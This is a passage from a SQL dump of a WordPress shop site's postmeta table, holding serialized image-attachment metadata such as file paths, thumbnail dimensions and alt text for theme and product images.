:\"shop_single\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-600x689.png\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1648,570,'_wp_attachment_image_alt','a'),(1649,1076,'_wp_attached_file','2018/01/h2-slider1-graphic4.png'),(1650,1076,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:467;s:6:\"height\";i:337;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic4.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic4-300x216.png\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic4-467x300.png\";s:5:\"width\";i:467;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic4-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1651,591,'_wp_attached_file','2018/01/h10-slide1-graphic1.jpg'),(1652,591,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1093;s:4:\"file\";s:31:\"2018/01/h10-slide1-graphic1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide1-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-600x342.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h10-slide1-graphic1-1024x583.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:583;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-768x437.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h10-slide1-graphic1-1536x874.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:874;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h10-slide1-graphic1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h10-slide1-graphic1-550x1093.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1093;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h10-slide1-graphic1-1100x1093.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1093;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide1-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-600x342.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1653,2480,'_wp_attachment_image_alt','a'),(1654,1076,'_wp_attachment_image_alt',''),(1655,2481,'_wp_attached_file','2018/01/product15-gallery2.jpg'),(1656,2481,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product15-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product15-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product15-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1657,1815,'_wp_attachment_image_alt','a'),(1658,1816,'_wp_attached_file','2018/02/portfolio-img-14.jpg'),(1659,1816,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2018/02/portfolio-img-14.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"portfolio-img-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"portfolio-img-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1660,2481,'_wp_attachment_image_alt','a'),(1661,1077,'_wp_attached_file','2018/01/h2-slider1-graphic5.png'),(1662,1077,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:497;s:6:\"height\";i:509;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic5.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic5-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic5-293x300.png\";s:5:\"width\";i:293;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic5-497x300.png\";s:5:\"width\";i:497;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic5-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic5-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1663,2482,'_wp_attached_file','2018/01/product15-gallery3.jpg'); INSERT INTO `wpvt_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (1664,2482,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product15-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product15-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product15-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1665,1077,'_wp_attachment_image_alt','o'),(1666,1816,'_wp_attachment_image_alt','a'),(1667,2482,'_wp_attachment_image_alt',''),(1668,1078,'_wp_attached_file','2018/01/h2-slider1-graphic2.png'),(1669,1078,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:316;s:6:\"height\";i:432;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic2.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic2-219x300.png\";s:5:\"width\";i:219;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic2-316x300.png\";s:5:\"width\";i:316;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1670,2483,'_wp_attached_file','2018/01/product-16.jpg'),(1671,2483,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2018/01/product-16.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"product-16-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"product-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"product-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"product-16-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"product-16-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"product-16-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"product-16-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"product-16-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"product-16-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"product-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"product-16-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1672,591,'_wp_attachment_image_alt','o'),(1673,592,'_wp_attached_file','2018/01/h3-img5.jpg'),(1674,592,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:19:\"2018/01/h3-img5.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h3-img5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"h3-img5-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h3-img5-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"h3-img5-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"h3-img5-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"h3-img5-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h3-img5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"h3-img5-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"h3-img5-550x550.jpg\";s:5:\